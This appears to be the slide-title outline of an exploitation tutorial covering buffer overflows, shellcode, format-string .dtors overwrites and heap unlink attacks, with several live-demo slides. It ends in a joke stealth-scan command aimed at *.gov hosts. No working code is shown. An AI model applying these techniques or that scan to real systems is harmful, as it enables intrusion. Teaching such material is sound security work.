Sploit 101 Buffer Overflows, Format Strings, Heap Overflows |
Warning |
Basics For Sploit Testing |
The Buffer Overflow |
Example Vuln Program |
Program Layout in Memory |
Program Layout in Memory |
Important Stack Info - Registers |
Getting ESP |
Shellcode |
Example of Shellcode (Aleph1) |
Using gdb To Find The Sweet Spot |
gdb In Action |
Pulling This All Together |
Live Demo |
Small Buffer |
Use An ENV Variable |
Small Buffer Layout |
Live Demo |
Remote Exploits |
Example Vulnerable Remote Program |
Assuming You Have Source |
Live Demo |
Format String Exploit |
Vulnerable Format String Code |
Steps For Format String Exploitation |
Stack Mapping |
Reading Memory Locations |
Writing To Memory |
.dtors |
Computing .dtors Location |
Live Demo |
Heap Overflow – Simple Example |
Heap Overflow – Realistic Example |
Malloc |
Malloc |
Bins |
dlmalloc Functions |
free() Behavior |
unlink() |
Vulnerable Heap Overflow Code |
We Need Two Values |
What to Inject |
What to Inject |
What to Inject |
Live Demo |
Finding The Bugs To Sploit |
Questions? |
./nmrc -sS -T Paranoid *.gov |